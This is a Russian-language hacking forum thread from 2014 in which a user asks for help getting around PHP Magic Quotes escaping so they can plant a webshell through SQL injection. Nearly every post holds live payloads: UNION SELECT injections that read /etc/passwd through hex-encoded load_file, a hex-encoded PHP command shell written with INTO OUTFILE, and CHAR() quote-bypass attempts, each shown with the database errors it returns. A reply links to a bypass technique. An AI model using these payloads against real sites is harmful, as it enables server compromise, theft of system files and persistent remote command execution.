Необходима помощь в обходе Magic Quotes в загрузке Shell'a

Discussion in 'Песочница' started by 2Polar, 9 Feb 2014.

  1. 2Polar

    2Polar Banned

    Joined:
    8 Feb 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Добрый день, помогите, пожалуйста, обойти блокировку кавычек для заливки шелла. Права на заливку есть.

    -3+UNION+ALL+SELECT+1,2,3,
    load_file(0x2f6574632f706173737764)
    ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,
    19,20,21,22,23,24,25,26,27--


    - подобный запрос без ошибок открывает файл /etc/passwd.

    Если убрать hex, load_file('/etc/passwd')

    -3+UNION+ALL+SELECT+1,2,load_file(%27/etc/passwd%27),4-- выдает

    DB Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/etc/passwd'),4--' at line 1

    (в идентичном параметре, поэтому разное кол-во колонок)

    Заливка шелла:
    -3+UNION+ALL+SELECT+1,2,3,0x3c3f696e636c75646528245f4745545b22636d64225d293b3f3e,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+INTO+OUTFILE+%27/tmp/smthng.txt%27--

    выдает:


    DB Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/tmp/smthng.txt'-- AND publish_date<='1391955091'' at line 1


    Вопрос: как избежать проблем с кавычками? Пробовал словом CHAR - бесполезно.

    p.s запрос ###=2’ выводит:

    DB Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Ђ™ AND publish_date<='1391955884'' at line 1
     
    #1 2Polar, 9 Feb 2014
    Last edited: 9 Feb 2014
  2. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    372
    Likes Received:
    163
    Reputations:
    126
    В 1 из 1000 случаев поможет
    http://forum.antichat.ru/showpost.php?p=663815&postcount=25 .
     
    _________________________
  3. 2Polar

    2Polar Banned

    Joined:
    8 Feb 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    -3+UNION+ALL+SELECT+1,2,3,load_file(char(39,47,116,109,112,47,114,105,118,97,46,112,104,112,39)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

    вот такой char код загружается без проблем. мб им можно кавычки как то проставить?
     
  4. 2Polar

    2Polar Banned

    Joined:
    8 Feb 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    -2+union+all+select+0x27,2,3,4--+ - не выдает ошибок почему-то, хотя кавычка выставлена

    если в конце /* - ошибка выходит

    при hex запросе 0x5c272f6574632f7061737377645c27 = '/etc/passwd' выводит
    \'/etc/passwd\'


    kingbeef, запрос из той ссылки не работает. экранирует кавычки
     
    #4 2Polar, 9 Feb 2014
    Last edited: 9 Feb 2014
Loading...